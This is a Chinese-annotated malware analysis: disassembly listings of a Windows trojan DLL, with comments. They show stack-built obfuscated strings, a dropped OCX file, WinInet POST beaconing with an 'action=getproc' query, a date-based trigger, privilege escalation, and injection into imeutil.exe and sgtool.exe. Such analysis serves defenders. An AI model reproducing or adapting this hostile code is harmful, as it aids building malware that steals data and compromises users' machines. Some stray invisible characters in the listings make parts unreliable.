1000A4CA 68 D42B0010 push 10002BD4 ; ASCII "C:\WINDOWS\system32\dbr31004.ocx"
1000A4CF FF75 08 push dword ptr [ebp+8]
1000A4D2 FFD3 call ebx ; 得到完整的文件名,GetModuleFileNameA
1000A4D4 8065 FC 00 and byte ptr [ebp-4], 0
1000A4D8 3975 0C cmp dword ptr [ebp+C], esi
1000A4DB C645 F0 65 mov byte ptr [ebp-10], 65 ; explorer.exe
1000A4DF C645 F1 78 mov byte ptr [ebp-F], 78
1000A4E3 C645 F2 70 mov byte ptr [ebp-E], 70
1000A4E7 C645 F3 6C mov byte ptr [ebp-D], 6C
1000A4EB C645 F4 6F mov byte ptr [ebp-C], 6F
1000A4EF C645 F5 72 mov byte ptr [ebp-B], 72
1000A4F3 C645 F6 65 mov byte ptr [ebp-A], 65
1000A4F7 C645 F7 72 mov byte ptr [ebp-9], 72
1000A4FB C645 F8 2E mov byte ptr [ebp-8], 2E
1000A4FF C645 F9 65 mov byte ptr [ebp-7], 65
1000A503 C645 FA 78 mov byte ptr [ebp-6], 78
1000A507 C645 FB 65 mov byte ptr [ebp-5], 65
1000A50B 74 43 je short 1000A550
1000A50D 57 push edi ; 大寫變小寫
1000A50E FF15 70310010 call dword ptr [<&MSVCRT._strlwr>] ; msvcrt._strlwr
1000A514 8B35 B4310010 mov esi, dword ptr [<&MSVCRT.strstr>>; msvcrt.strstr
1000A51A C70424 E43E0010 mov dword ptr [esp], 10003EE4 ; ASCII "gbvgbv" 這個字符串有些熟悉,母體的時候就是將rundll32.exe複製成gbvgbv31.exe
1000A521 57 push edi
1000A522 FFD6 call esi
1000A524 59 pop ecx
1000A525 85C0 test eax, eax
1000A527 59 pop ecx
1000A528 75 16 jnz short 1000A540
1000A52A 8D45 F0 lea eax, dword ptr [ebp-10]
1000A52D 50 push eax
1000A52E 57 push edi
1000A52F FFD6 call esi
1000A531 59 pop ecx
1000A532 85C0 test eax, eax
1000A534 59 pop ecx
1000A535 75 09 jnz short 1000A540
1000A537 E8 09FFFFFF call 1000A445 ;這個call寫入PE文件,得到函數地址等

{


1000A445 55 push ebp
1000A446 8BEC mov ebp, esp
1000A448 83EC 0C sub esp, 0C
1000A44B 8365 F4 00 and dword ptr [ebp-C], 0
1000A44F 8365 F8 00 and dword ptr [ebp-8], 0
1000A453 8D45 F4 lea eax, dword ptr [ebp-C]
1000A456 C745 FC 0100000>mov dword ptr [ebp-4], 1
1000A45D 50 push eax
1000A45E E8 25FFFFFF call 1000A388 ;
{


1000A388 55 push ebp
1000A389 8BEC mov ebp, esp
1000A38B 51 push ecx
1000A38C 51 push ecx
1000A38D 53 push ebx
1000A38E 33DB xor ebx, ebx
1000A390 53 push ebx
1000A391 53 push ebx
1000A392 6A 03 push 3
1000A394 53 push ebx
1000A395 6A 01 push 1
1000A397 68 00000080 push 80000000
1000A39C 68 D42B0010 push 10002BD4 ; ASCII "C:\WINDOWS\system32\dbr31004.ocx"
1000A3A1 FF15 A4300010 call dword ptr [<&KERNEL32.CreateFile>; kernel32.CreateFileA
1000A3A7 83F8 FF cmp eax, -1
1000A3AA 8945 FC mov dword ptr [ebp-4], eax
1000A3AD 74 58 je short 1000A407
1000A3AF 56 push esi
1000A3B0 57 push edi
1000A3B1 53 push ebx
1000A3B2 50 push eax
1000A3B3 FF15 0C310010 call dword ptr [<&KERNEL32.GetFileSiz>; kernel32.GetFileSize
1000A3B9 8BF0 mov esi, eax
1000A3BB 6A 04 push 4
1000A3BD 68 00100000 push 1000
1000A3C2 56 push esi
1000A3C3 53 push ebx
1000A3C4 FF15 D0300010 call dword ptr [<&KERNEL32.VirtualAll>; kernel32.VirtualAlloc
1000A3CA 8BF8 mov edi, eax
1000A3CC 3BFB cmp edi, ebx
1000A3CE 74 2C je short 1000A3FC
1000A3D0 8D45 F8 lea eax, dword ptr [ebp-8]
1000A3D3 53 push ebx
1000A3D4 50 push eax
1000A3D5 56 push esi
1000A3D6 57 push edi
1000A3D7 FF75 FC push dword ptr [ebp-4]
1000A3DA FF15 BC300010 call dword ptr [<&KERNEL32.ReadFile>] ; kernel32.ReadFile
1000A3E0 56 push esi
1000A3E1 57 push edi
1000A3E2 FF75 08 push dword ptr [ebp+8]
1000A3E5 E8 51FFFFFF call 1000A33B ; 進行PE操作,得到函數的地址等等

{
判斷是否是PE文件,就是判斷MZ,PE即,5A4D,4550
1000A136 8B4424 04 mov eax, dword ptr [esp+4]
1000A13A 66:8138 4D5A cmp word ptr [eax], 5A4D
1000A13F 75 10 jnz short 1000A151
1000A141 8B48 3C mov ecx, dword ptr [eax+3C] ;IMAGE_DOS_HEADER,偏移3C處的e_lfanew
1000A144 813C01 50450000 cmp dword ptr [ecx+eax], 4550
1000A14B 75 04 jnz short 1000A151
1000A14D 6A 01 push 1
1000A14F 58 pop eax
1000A150 C3 retn

}
1000A3EA 83C4 0C add esp, 0C
1000A3ED 8BD8 mov ebx, eax
1000A3EF 68 00400000 push 4000
1000A3F4 56 push esi
1000A3F5 57 push edi
1000A3F6 FF15 04310010 call dword ptr [<&KERNEL32.VirtualFre>; kernel32.VirtualFree
1000A3FC FF75 FC push dword ptr [ebp-4]
1000A3FF FF15 30310010 call dword ptr [<&KERNEL32.CloseHandl>; kernel32.CloseHandle
1000A405 5F pop edi
1000A406 5E pop esi
1000A407 8BC3 mov eax, ebx
1000A409 5B pop ebx
1000A40A C9 leave
1000A40B C3 retn

}
1000A463 C70424 D42B0010 mov dword ptr [esp], 10002BD4 ; ASCII "C:\WINDOWS\system32\dbr31004.ocx"
1000A46A 8D45 F4 lea eax, dword ptr [ebp-C]
1000A46D 68 66668888 push 88886666
1000A472 50 push eax
1000A473 E8 94FFFFFF call 1000A40C
1000A478 68 00100000 push 1000
1000A47D 6A 00 push 0
1000A47F FF75 F4 push dword ptr [ebp-C]
1000A482 E8 23090000 call <jmp.&MSVCRT.mem​​set>
1000A487 83C4 18 add esp, 18
1000A48A C9 leave
1000A48B C3 retn

}
1000A53C 33C0 xor eax, eax
1000A53E EB 1F jmp short 1000A55F
1000A540 FF75 10 push dword ptr [ebp+10]
1000A543 FF75 0C push dword ptr [ebp+C]
1000A546 FF75 08 push dword ptr [ebp+8]
1000A549 E8 94030000 call 1000A8E2
1000A54E EB 0F jmp short 1000A55F
1000A550 6A 00 push 0
1000A552 6A 01 push 1
1000A554 FF75 08 push dword ptr [ebp+8]
1000A557 E8 86030000 call 1000A8E2
1000A55C 6A 01 push 1
1000A55E 58 pop eax
1000A55F 5F pop edi
1000A560 5E pop esi
1000A561 5B pop ebx
1000A562 C9 leave
1000A563 C3 retn









進行網絡操作的線程3,進行post

ASCII "WININET.dll"
kernel32.LoadLibraryA
ASCII "InternetOpenA"
766957c6
ASCII "InternetOpenUrlA"
76695a92

ASCII "HttpQueryInfoA"
76697932
ASCII "InternetReadFile"
7669825f

ASCII "InternetCloseHandle"
76694dc4


10007ED5 55 push ebp
10007ED6 8BEC mov ebp, esp
10007ED8 81EC F8030000 sub esp, 3F8
10007EDE 53 push ebx
10007EDF 57 push edi
10007EE0 6A 7F push 7F
10007EE2 33DB xor ebx, ebx
10007EE4 59 pop ecx
10007EE5 33C0 xor eax, eax
10007EE7 8DBD FDFDFFFF lea edi, dword ptr [ebp-203]
10007EED 889D FCFDFFFF mov byte ptr [ebp-204], bl
10007EF3 F3:AB rep stos dword ptr es:[edi]
10007EF5 FF75 0C push dword ptr [ebp+C]
10007EF8 66:AB stos word ptr es:[edi]
10007EFA AA stos byte ptr es:[edi]
10007EFB 8D85 FCFDFFFF lea eax, dword ptr [ebp-204]
10007F01 50 push eax
10007F02 E8 CB2E0000 call <jmp.&MSVCRT.strcpy>
10007F07 59 pop ecx
10007F08 59 pop ecx
10007F09 E8 B5C6FFFF call 100045C3 ; 獲取網絡操作的函數地址
10007F0E E8 A7FDFFFF call 10007CBA ; 同上,繼續獲得
10007F13 53 push ebx
10007F14 53 push ebx
10007F15 53 push ebx
10007F16 53 push ebx
10007F17 68 1C3D0010 push 10003D1C ; ASCII "HttpSendRequestEx"
10007F1C FF15 C0110010 call dword ptr [100011C0]
10007F22 3BC3 cmp eax, ebx
10007F24 8945 FC mov dword ptr [ebp-4], eax
10007F27 75 07 jnz short 10007F30
10007F29 53 push ebx
10007F2A FF15 6C310010 call dword ptr [<&MSVCRT.exit>] ; msvcrt.exit
10007F30 56 push esi
10007F31 8D85 FCFDFFFF lea eax, dword ptr [ebp-204]
10007F37 6A 3A push 3A
10007F39 50 push eax
10007F3A FF15 48310010 call dword ptr [<&MSVCRT.strchr>] ; msvcrt.strchr
10007F40 8BF0 mov esi, eax
10007F42 59 pop ecx
10007F43 3BF3 cmp esi, ebx
10007F45 59 pop ecx
10007F46 74 0F je short 10007F57
10007F48 8D46 01 lea eax, dword ptr [esi+1]
10007F4B 50 push eax
10007F4C FF15 78310010 call dword ptr [<&MSVCRT.atoi>] ; msvcrt.atoi
10007F52 59 pop ecx
10007F53 881E mov byte ptr [esi], bl
10007F55 EB 03 jmp short 10007F5A
10007F57 6A 50 push 50
10007F59 58 pop eax
10007F5A 53 push ebx
10007F5B 53 push ebx
10007F5C 6A 03 push 3
10007F5E 53 push ebx
10007F5F 53 push ebx
10007F60 50 push eax
10007F61 8D85 FCFDFFFF lea eax, dword ptr [ebp-204]
10007F67 50 push eax
10007F68 FF75 FC push dword ptr [ebp-4]
10007F6B FF15 C0200010 call dword ptr [100020C0]
10007F71 8BF8 mov edi, eax
10007F73 3BFB cmp edi, ebx
10007F75 74 67 je short 10007FDE
10007F77 53 push ebx
10007F78 68 00000004 push 4000000
10007F7D 53 push ebx
10007F7E 53 push ebx
10007F7F 53 push ebx
10007F80 FF75 10 push dword ptr [ebp+10]
10007F83 68 143D0010 push 10003D14 ; ASCII "POST"
10007F88 57 push edi
10007F89 FF15 C4200010 call dword ptr [100020C4]
10007F8F 8BF0 mov esi, eax
10007F91 3BF3 cmp esi, ebx
10007F93 74 42 je short 10007FD7
10007F95 FF75 08 push dword ptr [ebp+8]
10007F98 56 push esi
10007F99 E8 6BFBFFFF call 10007B09
10007F9E 59 pop ecx
10007F9F 85C0 test eax, eax
10007FA1 59 pop ecx
10007FA2 74 2C je short 10007FD0
10007FA4 8D45 0C lea eax, dword ptr [ebp+C]
10007FA7 895D 0C mov dword ptr [ebp+C], ebx
10007FAA 50 push eax
10007FAB 8D85 08FCFFFF lea eax, dword ptr [ebp-3F8]
10007FB1 68 F3010000 push 1F3
10007FB6 50 push eax
10007FB7 56 push esi
10007FB8 FF15 B4110010 call dword ptr [100011B4]
10007FBE 85C0 test eax, eax
10007FC0 8B45 0C mov eax, dword ptr [ebp+C]
10007FC3 74 07 je short 10007FCC
10007FC5 889C05 08FCFFFF mov byte ptr [ebp+eax-3F8], bl
10007FCC 3BC3 cmp eax, ebx
10007FCE ^ 77 D4 ja short 10007FA4
10007FD0 56 push esi
10007FD1 FF15 B8110010 call dword ptr [100011B8]
10007FD7 57 push edi
10007FD8 FF15 B8110010 call dword ptr [100011B8]
10007FDE FF75 FC push dword ptr [ebp-4]
10007FE1 FF15 B8110010 call dword ptr [100011B8]
10007FE7 5E pop esi
10007FE8 5F pop edi
10007FE9 5B pop ebx
10007FEA C9 leave
10007FEB C3 retn


線程4同樣進行網絡數據傳輸:
10008C1E 55 push ebp ; 線程4
10008C1F 8BEC mov ebp, esp
10008C21 81EC 28040000 sub esp, 428
10008C27 53 push ebx
10008C28 56 push esi
10008C29 8B35 B0300010 mov esi, dword ptr [<&KERNEL32.Sleep>] ; kernel32.Sleep
10008C2F 57 push edi
10008C30 33DB xor ebx, ebx
10008C32 68 B80B0000 push 0BB8
10008C37 895D FC mov dword ptr [ebp-4], ebx
10008C3A FFD6 call esi
10008C3C 391D FC210010 cmp dword ptr [100021FC], ebx
10008C42 75 05 jnz short 10008C49
10008C44 E8 77F4FFFF call 100080C0 ; 加載ws2_32.dll,其中獲得recv,recvfrom函數地地址
10008C49 E8 B3F5FFFF call 10008201
10008C4E 85C0 test eax, eax
10008C50 74 03 je short 10008C55
10008C52 895D FC mov dword ptr [ebp-4], ebx
10008C55 6A 7F push 7F
10008C57 33C0 xor eax, eax
10008C59 59 pop ecx
10008C5A 8DBD D9FDFFFF lea edi, dword ptr [ebp-227]
10008C60 889D D8FDFFFF mov byte ptr [ebp-228], bl
10008C66 F3:AB rep stos dword ptr es:[edi]
10008C68 66:AB stos word ptr es:[edi]
10008C6A AA stos byte ptr es:[edi]
10008C6B 68 D0070000 push 7D0
10008C70 FFD6 call esi
10008C72 395D FC cmp dword ptr [ebp-4], ebx
10008C75 75 08 jnz short 10008C7F
10008C77 E8 85F5FFFF call 10008201
10008C7C 8945 FC mov dword ptr [ebp-4], eax
10008C7F 68 00020000 push 200
10008C84 8D85 D8FDFFFF lea eax, dword ptr [ebp-228]
10008C8A 53 push ebx
10008C8B 50 push eax
10008C8C E8 19210000 call <jmp.&MSVCRT.mem​​set>
10008C91 68 BC1C0010 push 10001CBC
10008C96 8D45 E4 lea eax, dword ptr [ebp-1C]
10008C99 68 F4200010 push 100020F4
10008C9E 50 push eax
10008C9F 8D85 D8FBFFFF lea eax, dword ptr [ebp-428]
10008CA5 C645 E​​4 25 mov byte ptr [ebp-1C], 25
10008CA9 50 push eax
10008CAA C645 E​​5 73 mov byte ptr [ebp-1B], 73
10008CAE C645 E​​6 3F mov byte ptr [ebp-1A], 3F
10008CB2 C645 E​​7 61 mov byte ptr [ebp-19], 61
10008CB6 C645 E​​8 63 mov byte ptr [ebp-18], 63
10008CBA C645 E​​9 74 mov byte ptr [ebp-17], 74
10008CBE C645 E​​A 69 mov byte ptr [ebp-16], 69
10008CC2 C645 E​​B 6F mov byte ptr [ebp-15], 6F
10008CC6 C645 E​​C 6E mov byte ptr [ebp-14], 6E
10008CCA C645 E​​D 3D mov byte ptr [ebp-13], 3D
10008CCE C645 E​​E 67 mov byte ptr [ebp-12], 67
10008CD2 C645 E​​F 65 mov byte ptr [ebp-11], 65
10008CD6 C645 F0 74 mov byte ptr [ebp-10], 74
10008CDA C645 F1 70 mov byte ptr [ebp-F], 70
10008CDE C645 F2 72 mov byte ptr [ebp-E], 72
10008CE2 C645 F3 6F mov byte ptr [ebp-D], 6F
10008CE6 C645 F4 63 mov byte ptr [ebp-C], 63
10008CEA C645 F5 26 mov byte ptr [ebp-B], 26
10008CEE C645 F6 75 mov byte ptr [ebp-A], 75
10008CF2 C645 F7 3D mov byte ptr [ebp-9], 3D
10008CF6 C645 F8 25 mov byte ptr [ebp-8], 25
10008CFA C645 F9 73 mov byte ptr [ebp-7], 73
10008CFE 885D FA mov byte ptr [ebp-6], bl
10008D01 FF15 F0310010 call dword ptr [<&USER32.wsprintfA>] ; USER32.wsprintfA
10008D07 83C4 1C add esp, 1C ; ? action=getproc&u=
10008D0A 381D F8210010 cmp byte ptr [100021F8], bl
10008D10 ^ 0F85 55FFFFFF jnz 10008C6B
10008D16 8D45 E0 lea eax, dword ptr [ebp-20]
10008D19 50 push eax
10008D1A 8D85 D8FDFFFF lea eax, dword ptr [ebp-228]
10008D20 50 push eax
10008D21 8D85 D8FBFFFF lea eax, dword ptr [ebp-428]
10008D27 50 push eax
10008D28 E8 FCECFFFF call 10007A29
10008D2D 83C4 0C add esp, 0C
10008D30 85C0 test eax, eax
10008D32 74 5A je short 10008D8E
10008D34 8B45 E0 mov eax, dword ptr [ebp-20]
10008D37 889C05 D8FDFFFF mov byte ptr [ebp+eax-228], bl
10008D3E 8D85 D8FDFFFF lea eax, dword ptr [ebp-228]
10008D44 50 push eax
10008D45 E8 FAF9FFFF call 10008744
10008D4A 8D85 D8FDFFFF lea eax, dword ptr [ebp-228]
10008D50 50 push eax
10008D51 E8 C3F9FFFF call 10008719
10008D56 59 pop ecx
10008D57 83F8 01 cmp eax, 1
10008D5A 59 pop ecx
10008D5B 74 3E je short 10008D9B
10008D5D 381D D4200010 cmp byte ptr [100020D4], bl
10008D63 74 29 je short 10008D8E
10008D65 833D F0200010 0>cmp dword ptr [100020F0], 1
10008D6C 7E 12 jle short 10008D80
10008D6E 891D F0200010 mov dword ptr [100020F0], ebx
10008D74 881D D4200010 mov byte ptr [100020D4], bl
10008D7A 891D 14220010 mov dword ptr [10002214], ebx
10008D80 381D D4200010 cmp byte ptr [100020D4], bl
10008D86 74 06 je short 10008D8E
10008D88 FF05 F0200010 inc dword ptr [100020F0]
10008D8E 391D 1C220010 cmp dword ptr [1000221C], ebx
10008D94 75 68 jnz short 10008DFE
10008D96 ^ E9 D0FEFFFF jmp 10008C6B
10008D9B A1 FC210010 mov eax, dword ptr [100021FC]
10008DA0 3BC3 cmp eax, ebx
10008DA2 74 31 je short 10008DD5
10008DA4 895D DC mov dword ptr [ebp-24], ebx
10008DA7 7E 36 jle short 10008DDF
10008DA9 C745 FC 0422001>mov dword ptr [ebp-4], 10002204
10008DB0 8B45 FC mov eax, dword ptr [ebp-4]
10008DB3 8B00 mov eax, dword ptr [eax]
10008DB5 8945 D8 mov dword ptr [ebp-28], eax
10008DB8 60 pushad
10008DB9 8B45 D8 mov eax, dword ptr [ebp-28]
10008DBC FFD0 call eax
10008DBE 61 popad
10008DBF FF45 DC inc dword ptr [ebp-24]
10008DC2 8345 FC 04 add dword ptr [ebp-4], 4
10008DC6 8B45 DC mov eax, dword ptr [ebp-24]
10008DC9 3B05 FC210010 cmp eax, dword ptr [100021FC]
10008DCF ^ 7C DF jl short 10008DB0
10008DD1 33DB xor ebx, ebx
10008DD3 EB 0A jmp short 10008DDF
10008DD5 E8 B0F2FFFF call 1000808A
10008DDA E8 D3F2FFFF call 100080B2
10008DDF 391D 14220010 cmp dword ptr [10002214], ebx
10008DE5 75 11 jnz short 10008DF8
10008DE7 53 push ebx
10008DE8 C705 14220010 0>mov dword ptr [10002214], 1
10008DF2 E8 1FFCFFFF call 10008A16
10008DF7 59 pop ecx
10008DF8 891D E8200010 mov dword ptr [100020E8], ebx
10008DFE 5F pop edi
10008DFF 5E pop esi
10008E00 5B pop ebx
10008E01 C9 leave
10008E02 C3 retn




線程5
1000AB68 55 push ebp ; 線程5
1000AB69 8BEC mov ebp, esp
1000AB6B 6A FF push -1
1000AB6D 68 903F0010 push 10003F90
1000AB72 68 C0AD0010 push <jmp.&MSVCRT._except_handler3>
1000AB77 64:A1 00000000 mov eax, dword ptr fs:[0]
1000AB7D 50 push eax
1000AB7E 64:8925 0000000>mov dword ptr fs:[0], esp
1000AB85 81EC 70020000 sub esp, 270
1000AB8B 53 push ebx
1000AB8C 56 push esi
1000AB8D 57 push edi
1000AB8E 8965 E8 mov dword ptr [ebp-18], esp
1000AB91 80A5 D4FEFFFF 0>and byte ptr [ebp-12C], 0
1000AB98 6A 40 push 40
1000AB9A 59 pop ecx
1000AB9B 33C0 xor eax, eax
1000AB9D 8DBD D5FEFFFF lea edi, dword ptr [ebp-12B]
1000ABA3 F3:AB rep stos dword ptr es:[edi]
1000ABA5 66:AB stos word ptr es:[edi]
1000ABA7 AA stos byte ptr es:[edi]
1000ABA8 C645 D8 65 mov byte ptr [ebp-28], 65
1000ABAC C645 D9 78 mov byte ptr [ebp-27], 78
1000ABB0 C645 DA 70 mov byte ptr [ebp-26], 70
1000ABB4 C645 DB 6C mov byte ptr [ebp-25], 6C
1000ABB8 C645 DC 6F mov byte ptr [ebp-24], 6F
1000ABBC C645 DD 72 mov byte ptr [ebp-23], 72
1000ABC0 C645 DE 65 mov byte ptr [ebp-22], 65
1000ABC4 C645 DF 72 mov byte ptr [ebp-21], 72
1000ABC8 C645 E​​0 2E mov byte ptr [ebp-20], 2E
1000ABCC C645 E​​1 65 mov byte ptr [ebp-1F], 65
1000ABD0 C645 E​​2 78 mov byte ptr [ebp-1E], 78
1000ABD4 C645 E​​3 65 mov byte ptr [ebp-1D], 65
1000ABD8 8065 E4 00 and byte ptr [ebp-1C], 0
1000ABDC 80A5 90FEFFFF 0>and byte ptr [ebp-170], 0
1000ABE3 6A 0F push 0F
1000ABE5 59 pop ecx
1000ABE6 33C0 xor eax, eax
1000ABE8 8DBD 91FEFFFF lea edi, dword ptr [ebp-16F]
1000ABEE F3:AB rep stos dword ptr es:[edi]
1000ABF0 66:AB stos word ptr es:[edi]
1000ABF2 AA stos byte ptr es:[edi]
1000ABF3 68 683D0010 push 10003D68 ; ASCII "ldjgam"
1000ABF8 8D85 90FEFFFF lea eax, dword ptr [ebp-170]
1000ABFE 50 push eax
1000ABFF E8 CE010000 call <jmp.&MSVCRT.strcpy>
1000AC04 68 603D0010 push 10003D60 ; ASCII "e.exe"
1000AC09 8D85 90FEFFFF lea eax, dword ptr [ebp-170]
1000AC0F 50 push eax
1000AC10 E8 B1010000 call <jmp.&MSVCRT.strcat>
1000AC15 BE D82C0010 mov esi, 10002CD8
1000AC1A 56 push esi
1000AC1B 8B1D 70310010 mov ebx, dword ptr [<&MSVCRT._strlwr>] ; msvcrt._strlwr
1000AC21 FFD3 call ebx
1000AC23 8D45 D8 lea eax, dword ptr [ebp-28]
1000AC26 50 push eax
1000AC27 56 push esi
1000AC28 FF15 B4310010 call dword ptr [<&MSVCRT.strstr>] ; msvcrt.strstr
1000AC2E 83C4 1C add esp, 1C
1000AC31 85C0 test eax, eax
1000AC33 74 29 je short 1000AC5E
1000AC35 33FF xor edi, edi
1000AC37 57 push edi
1000AC38 E8 F5CBFFFF call 10007832
1000AC3D 59 pop ecx
1000AC3E 57 push edi
1000AC3F 57 push edi
1000AC40 57 push edi
1000AC41 68 BF900010 push 100090BF
1000AC46 57 push edi
1000AC47 57 push edi
1000AC48 FF15 DC300010 call dword ptr [<&KERNEL32.CreateThread>] ; kernel32.CreateThread
1000AC4E 57 push edi
1000AC4F 57 push edi
1000AC50 57 push edi
1000AC51 68 1C910010 push 1000911C
1000AC56 57 push edi
1000AC57 57 push edi
1000AC58 FF15 DC300010 call dword ptr [<&KERNEL32.CreateThread>] ; kernel32.CreateThread
1000AC5E 80A5 88FDFFFF 0>and byte ptr [ebp-278], 0
1000AC65 6A 40 push 40
1000AC67 59 pop ecx
1000AC68 33C0 xor eax, eax
1000AC6A 8DBD 89FDFFFF lea edi, dword ptr [ebp-277]
1000AC70 F3:AB rep stos dword ptr es:[edi]
1000AC72 66:AB stos word ptr es:[edi]
1000AC74 AA stos byte ptr es:[edi]
1000AC75 68 04010000 push 104
1000AC7A 8D85 D4FEFFFF lea eax, dword ptr [ebp-12C]
1000AC80 50 push eax
1000AC81 6A 00 push 0
1000AC83 FF15 4C300010 call dword ptr [<&KERNEL32.GetModuleFileNa>; kernel32.GetModuleFileNameA
1000AC89 8365 FC 00 and dword ptr [ebp-4], 0
1000AC8D E8 B19FFFFF call 10004C43 ; 時間判斷2011.8.19
1000AC92 85C0 test eax, eax
1000AC94 0F85 D6000000 jnz 1000AD70
1000AC9A 8D85 90FEFFFF lea eax, dword ptr [ebp-170]
1000ACA0 50 push eax
1000ACA1 8D85 88FDFFFF lea eax, dword ptr [ebp-278]
1000ACA7 50 push eax
1000ACA8 E8 25010000 call <jmp.&MSVCRT.strcpy>
1000ACAD 59 pop ecx
1000ACAE 59 pop ecx
1000ACAF FF15 2C310010 call dword ptr [<&KERNEL32.GetCurrentProce>; kernel32.GetCurrentProcessId
1000ACB5 8985 D0FEFFFF mov dword ptr [ebp-130], eax
1000ACBB 56 push esi
1000ACBC FFD3 call ebx
1000ACBE 8D85 88FDFFFF lea eax, dword ptr [ebp-278]
1000ACC4 50 push eax
1000ACC5 FFD3 call ebx
1000ACC7 8D85 88FDFFFF lea eax, dword ptr [ebp-278]
1000ACCD 50 push eax
1000ACCE 56 push esi
1000ACCF 8B3D B4310010 mov edi, dword ptr [<&MSVCRT.strstr>] ; msvcrt.strstr
1000ACD5 FFD7 call edi
1000ACD7 83C4 10 add esp, 10
1000ACDA 85C0 test eax, eax
1000ACDC 74 42 je short 1000AD20
1000ACDE 6A 5C push 5C
1000ACE0 8D85 D4FEFFFF lea eax, dword ptr [ebp-12C]
1000ACE6 50 push eax
1000ACE7 FF15 94310010 call dword ptr [<&MSVCRT.strrchr>] ; msvcrt.strrchr
1000ACED 59 pop ecx
1000ACEE 59 pop ecx
1000ACEF 8BF0 mov esi, eax
1000ACF1 46 inc esi
1000ACF2 89B5 8CFEFFFF mov dword ptr [ebp-174], esi
1000ACF8 83A5 84FDFFFF 0>and dword ptr [ebp-27C], 0
1000ACFF 8B85 84FDFFFF mov eax, dword ptr [ebp-27C]
1000AD05 8B0485 0C3F0010 mov eax, dword ptr [eax*4+10003F0C]
1000AD0C 85C0 test eax, eax
1000AD0E 74 60 je short 1000AD70
1000AD10 56 push esi
1000AD11 FFD0 call eax
1000AD13 59 pop ecx
1000AD14 85C0 test eax, eax
1000AD16 75 58 jnz short 1000AD70
1000AD18 FF85 84FDFFFF inc dword ptr [ebp-27C]
1000AD1E ^ EB DF jmp short 1000ACFF
1000AD20 68 703D0010 push 10003D70 ; ASCII "launch.exe"
1000AD25 56 push esi
1000AD26 FFD7 call edi
1000AD28 59 pop ecx
1000AD29 59 pop ecx
1000AD2A 85C0 test eax, eax
1000AD2C 74 42 je short 1000AD70
1000AD2E 6A 5C push 5C
1000AD30 8D85 D4FEFFFF lea eax, dword ptr [ebp-12C]
1000AD36 50 push eax
1000AD37 FF15 94310010 call dword ptr [<&MSVCRT.strrchr>] ; msvcrt.strrchr
1000AD3D 59 pop ecx
1000AD3E 59 pop ecx
1000AD3F 8BF0 mov esi, eax
1000AD41 46 inc esi
1000AD42 89B5 8CFEFFFF mov dword ptr [ebp-174], esi
1000AD48 83A5 80FDFFFF 0>and dword ptr [ebp-280], 0
1000AD4F 8B85 80FDFFFF mov eax, dword ptr [ebp-280]
1000AD55 8B0485 0C3F0010 mov eax, dword ptr [eax*4+10003F0C]
1000AD5C 85C0 test eax, eax
1000AD5E 74 10 je short 1000AD70
1000AD60 56 push esi
1000AD61 FFD0 call eax
1000AD63 59 pop ecx
1000AD64 85C0 test eax, eax
1000AD66 75 08 jnz short 1000AD70
1000AD68 FF85 80FDFFFF inc dword ptr [ebp-280]
1000AD6E ^ EB DF jmp short 1000AD4F
1000AD70 834D FC FF or dword ptr [ebp-4], FFFFFFFF
1000AD74 6A 01 push 1
1000AD76 58 pop eax
1000AD77 EB 0D jmp short 1000AD86
1000AD79 6A 01 push 1
1000AD7B 58 pop eax
1000AD7C C3 retn


線程6主要通過imeutil.exe與sgtool.exe實現注入,寫入數據
1000911C 55 push ebp ; 線程6
1000911D 8BEC mov ebp, esp
1000911F 6A FF push -1
10009121 68 803F0010 push 10003F80
10009126 68 C0AD0010 push <jmp.&MSVCRT._except_handler3>
1000912B 64:A1 00000000 mov eax, dword ptr fs:[0]
10009131 50 push eax
10009132 64:8925 0000000>mov dword ptr fs:[0], esp
10009139 81EC 740A0000 sub esp, 0A74
1000913F 53 push ebx
10009140 56 push esi
10009141 57 push edi
10009142 8965 E8 mov dword ptr [ebp-18], esp
10009145 C785 94FBFFFF 0>mov dword ptr [ebp-46C], 1
1000914F 33DB xor ebx, ebx
10009151 889D E0FDFFFF mov byte ptr [ebp-220], bl
10009157 6A 40 push 40
10009159 59 pop ecx
1000915A 33C0 xor eax, eax
1000915C 8DBD E1FDFFFF lea edi, dword ptr [ebp-21F]
10009162 F3:AB rep stos dword ptr es:[edi]
10009164 66:AB stos word ptr es:[edi]
10009166 AA stos byte ptr es:[edi]
10009167 6A 63 push 63
10009169 8D85 E0FDFFFF lea eax, dword ptr [ebp-220]
1000916F 50 push eax
10009170 E8 C8E5FFFF call 1000773D ; 找兩個ocx
10009175 E8 9FB2FFFF call 10004419 ; 提權
1000917A C685 E4FEFFFF 6>mov byte ptr [ebp-11C], 69 ; imeutil.exe
10009181 C685 E5FEFFFF 6>mov byte ptr [ebp-11B], 6D
10009188 C685 E6FEFFFF 6>mov byte ptr [ebp-11A], 65
1000918F C685 E7FEFFFF 7>mov byte ptr [ebp-119], 75
10009196 C685 E8FEFFFF 7>mov byte ptr [ebp-118], 74
1000919D C685 E9FEFFFF 6>mov byte ptr [ebp-117], 69
100091A4 C685 EAFEFFFF 6>mov byte ptr [ebp-116], 6C
100091AB C685 EBFEFFFF 2>mov byte ptr [ebp-115], 2E
100091B2 C685 ECFEFFFF 6>mov byte ptr [ebp-114], 65
100091B9 C685 EDFEFFFF 7>mov byte ptr [ebp-113], 78
100091C0 C685 EEFEFFFF 6>mov byte ptr [ebp-112], 65
100091C7 889D EFFEFFFF mov byte ptr [ebp-111], bl
100091CD 6A 3E push 3E
100091CF 5E pop esi
100091D0 8BCE mov ecx, esi
100091D2 33C0 xor eax, eax
100091D4 8DBD F0FEFFFF lea edi, dword ptr [ebp-110]
100091DA F3:AB rep stos dword ptr es:[edi]
100091DC C685 98FBFFFF 7>mov byte ptr [ebp-468], 73
100091E3 C685 99FBFFFF 6>mov byte ptr [ebp-467], 67 ; sgtool.exe
100091EA C685 9AFBFFFF 7>mov byte ptr [ebp-466], 74
100091F1 C685 9BFBFFFF 6>mov byte ptr [ebp-465], 6F
100091F8 C685 9CFBFFFF 6>mov byte ptr [ebp-464], 6F
100091FF C685 9DFBFFFF 6>mov byte ptr [ebp-463], 6C
10009206 C685 9EFBFFFF 2>mov byte ptr [ebp-462], 2E
1000920D C685 9FFBFFFF 6>mov byte ptr [ebp-461], 65
10009214 C685 A0FBFFFF 7>mov byte ptr [ebp-460], 78
1000921B C685 A1FBFFFF 6>mov byte ptr [ebp-45F], 65
10009222 889D A2FBFFFF mov byte ptr [ebp-45E], bl
10009228 8BCE mov ecx, esi
1000922A 8DBD A3FBFFFF lea edi, dword ptr [ebp-45D]
10009230 F3:AB rep stos dword ptr es:[edi]
10009232 AA stos byte ptr es:[edi]
